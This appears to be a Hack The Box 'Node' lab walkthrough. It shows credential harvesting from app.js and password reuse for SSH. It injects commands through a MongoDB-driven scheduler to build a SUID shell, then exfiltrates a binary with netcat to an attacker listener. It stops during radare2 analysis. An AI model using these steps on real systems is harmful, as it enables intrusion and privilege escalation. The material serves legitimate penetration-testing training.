Downloading the file and trying to read it shows us that it is base64. decoding the file with a different name shows us that the file is a zip file and trying to unzip the file shows us that it needs a password. These are the following commands to get this done.
While analyzing the source code, something that we want to do is a find a password we can search for passwords by typing the following command
kali@kali:~/HTB/node/var/www/myplace$ grep -Ri password
grep -Ri password . //specifies in current directory and list everything
grep -Ri password . | less /less output, easier to read.
After looking through the source code not much stood out, but we did notice that it ran mongodb
In order to figure out where the mongo connection is controlled, we can look at app.js
less app.js
/mongo
Found Username and password
Username: mark
Password: 5AYRft73VtFpc84k
Initial Access
After obtaing mongo db password, we attempt to SSH and it worked. Mark was using the same credentials for SSH and MongoDB. Bad practice Mark, bad practice.
Pivoting to TOM
After running LinEnum.sh somthing that stood out is teh running process running as tom.
Node scheduler running as tom. looking at it
Reading that file we are able to find credentials. The script takes everything in the task selection and passes it through exec.
That first one did not work, however retyping with different stickbits (hope thats right) we are able to escalate to tom
mark@node:/dev/shm$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks.in
scheduler.tasks.in
> db.tasks.insert ( { "cmd" : "chmod u+s /tmp/boomer" } )
WriteResult({ "nInserted" : 1 })
> db.find()
2020-10-15T14:27:25.393+0100 E QUERY [thread1] TypeError: db.find is not a function :
@(shell):1:1
> db.tasks.find()
> ^C
bye
mark@node:/dev/shm$ ls -la /tmp/boomer
-rwsr-xr-x 1 tom tom 154072 Oct 15 14:20 /tmp/boomer
mark@node:/dev/shm$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
$ whoami
tom
$
It would be ideal in this case to drop an ssh key so you can login as tom, unfortanetley, we don't have permissions to do so. So we will run LinEnum on it once more to see if we have any other findings.
PrivEsc to admin group
After running a more thourough nmap scan, we are able to look at the SUID's.
bash LinEnum.sh -t
something that stood out:
looks to be owned by root and is in the admin group. To PrivEsc into the admin group we will have to go through mongo db.
$ mongo -p -u mark scheduler
MongoDB shell version: 3.2.16
Enter password:
connecting to: scheduler
> db.tasks
scheduler.tasks
> db.tasks.insert( { "cmd" : "chown tom:admin /tmp/boomer; chmod 6755 /tmp/boomer;" } )
WriteResult({ "nInserted" : 1 })
> db.find()
2020-10-15T14:56:39.165+0100 E QUERY [thread1] TypeError: db.find is not a function :
@(shell):1:1
> db.tasks.find()
> ^C
bye
$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
$
Successful PrivEsc of group. Now that we are in the admin group we can acess usr/local/bin/backup we will use netcat to transfer since this is a big boi.
On our machine set up a listner as so.
nc -lvnp 8081 > backup
On the target machine:
nc [ip] [port] < /usr/local/bin/backup <--This is the file we are going to transfer.
Analyzing Backup Binary File
strace ./backup // nothing intersting
kali@kali:~/HTB/node$ r2 backup
[0x08048780]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
>aaa
>afl prints out function
>vvv visualization mode
